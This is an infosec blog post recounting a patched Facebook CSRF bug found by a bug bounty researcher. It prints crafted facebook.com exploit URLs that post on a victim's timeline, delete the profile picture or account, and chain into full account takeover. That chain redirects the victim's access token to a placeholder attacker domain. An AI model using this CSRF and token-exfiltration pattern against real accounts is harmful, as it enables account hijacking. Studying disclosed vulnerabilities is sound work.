Internet Security Blog - Hackology
Hack Facebook Account

[PoC] Hack Facebook Account with 1 Link

There are over 2.32 billion monthly active users on Facebook, and It gets scary when someone can hack your account just by sharing a constructed link. A recent Facebook hack can do the very same, just one click by the victim and the hacker could gain access to complete Facebook user account.

How Facebook Hack was Discovered

A critical cross-site request forgery (CSRF) vulnerability was discovered in Facebook that allows an attacker to take control of another Facebook account by fooling victim to click on a link. The fooling of victim and making them click the link is known as Social Engineering , when you just have to get a click it is the most easiest of things to do.

The attack seems long but it’s done in a blink of an eye and it’s dangerous because it doesn’t target a specific user but anyone who visits the link
The vulnerability was discovered by a security researcher named “Samm0uda” in flawed arbitrary endpoint on Facebook which could have been exploited to perform CSRF protection bypass and gain control over the user’s account. User password was never required in this Facebook Hack.

Although, the attacker must trick the victim into clicking a special link for the attack to be successful. An attacker could have been gaining full access to a Facebook account or posting anything on their timeline, changing or deleting their profile picture, and even trick users into deleting their entire Facebook accounts.

Proof of Concept

A vulnerable Facebook endpoint along with parameters and a POST request to that endpoint and adding the fb_dtsg parameter exploit to gain access to victim’s account. As endpoint resides on Facbook.com domain, it is easier to trick the victim to click on the link.

The vulnerable endpoint

https://www.facebook.com/comet/dialog_DONOTUSE/?url=XXXX

where XXXX is the endpoint with parameters where the POST request is going to be made (the CSRF token fb_dtsg is added automatically to the request body). The same attack vector can be further modified to perform a number of other actions on victim’s Facebook profile, which will be explained below.

Making a post on the timeline

When the victim clicks on the link , a post defined by the hacker will be made on victims Facebook Wall

https://www.facebook.com/comet/dialog_DONOTUSE/?url=/api/graphql/%3fdoc_id=1740513229408093%26variables={"input":{"actor_id":{TARGET_ID},"client_mutation_id":"1","source":"WWW","audience":{"web_privacyx":"REDECATED"},"message":{"text":"TEXT","ranges":[]}}}

Deleting Profile Picture

This is self explanatory , this link once executed will simply delete the profile picture set by victim on Facebook.

https://www.facebook.com/comet/dialog_DONOTUSE/?url=/profile/picture/remove_picture/%3fdelete_from_album=1%26profile_id={TARGET_ID}

Deleting Account

Hacker can also delete complete Facebook profile by using this URL, “locale” parameter could have been used to change language.

https://www.facebook.com/comet/dialog_DONOTUSE/?url=/help/delete_account/dialog/%3f__asyncDialog=0%26locale=fr_FR

A password confirmation will be required; if the victim enters his password, then his account will be deleted.

Gaining full access of Facebook account

Full access of Facebook account could have been obtained by adding an email address or phone to victim’s account. It requires two separate links to be sent to the victim, one to add email or phone and one to confirm it to redirect the user after a successful request. You might think that 2 links seems alot , but keep in mind that these 2 links will be having www.facebook.com as domain , thus the chances of success are really high and this time they are not punycode domains but actual domain.

However, Samm0uda managed to create a single link by using the endpoints which have “next” parameter. He shared four steps to create a unique link for hacking into a Facebook account.

STEP 1

Authorizing an app on behalf of victims to obtaining Facebook access token

https://www.facebook.com/comet/dialog_DONOTUSE/?url=/ajax/appcenter/redirect_to_app%3fapp_id={ATTACKER_APP}%26ref=appcenter_top_grossing%26redirect_uri=https%3a//www.facebook.com/v3.2/dialog/oauth%3fresponse_type%3dtoken%26client_id%3d{ATTACKER_APP}%26redirect_uri%3d{DOUBLE_URL_ENCODED_LINK}%26scope%3d&preview=0&fbs=125&sentence_id&gift_game=0&scopes[0]=email&gdpv4_source=dialog
This step use the endpoint /v3.2/dialog/oauth to bypass Facebook redirect protection in the “next” parameter which blocks redirecting attempts to external websites even if they are made using Link Shim.

Second to identify each victim using the token received which will help later to extract the confirmation code for that specific user.

Step 2.

The attacker website receives the access token of the user , creates an email for him under that domain and redirect the user to :

https://www.facebook.com/comet/dialog_DONOTUSE/?url=/add_contactpoint/dialog/submit/%3fcontactpoint={EMAIL_CHOSEN}%26next=/v3.2/dialog/oauth%253fresponse_type%253dtoken%2526client_id%253d{ATTACKER_APP}%2526redirect_uri%253d{DOUBLE_URL_ENCODED_LINK]

It links an email to the user account using the endpoint /add_contactpoint/dialog/submit/ (no password confirmation is required).

After the linking, it redirects to the selected endpoint in “next” parameter:

"/v3.2/dialog/oauth?response_type=token&client_id={ATTACKER_APP}&redirect_uri={ATTACKER_DOMAIN}"

which will redirect to the “ATTACKER_DOMAIN” again with the user access_token.

Step 3

The attacker website receives the “access_token”, extract the user ID then search for the email received for that user and gets the confirmation link then redirects again to :

https://www.facebook.com/confirmcontact.php?c={CODE}&z=0&gfid={HASH}

(CODE and HASH are in the email received from Facebook)

This method is simpler for the attacker but after the linking the endpoint redirects the victim to https://www.facebook.com/settings?section=email which expose the newly added email so the confirmation could be done using the /confirm_code/dialog/submit/ endpoint which have a “next” parameter that could redirect the victim to the home page after the confirmation is made.

Step 4

The email is now added to the victim account, the attacker could reset the password and takeover the account. The attack seems long but it’s done in a blink of an eye and it’s dangerous because it doesn’t target a specific user but anyone who visits the link in step 1

Conclusion

Two-factor authentication can prevent from full account takeover because it requires verification of passcode sent to users mobile but some actions such as posting something on the timeline, deleting and changing profile picture or deleting Facebook account cannot be prevented.

Facebook has fixed the vulnerability on 31st January 2019 and paid out $25,000 to the researcher for reporting this particular bug bounty, which is still not the highest bounty paid by Facebook but a great find indeed.

22 comments

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Get Wise

Subscribe to my newsletter to get latest InfoSec / Hacking News (1 Email/week)
Utopia p2p Ecosystem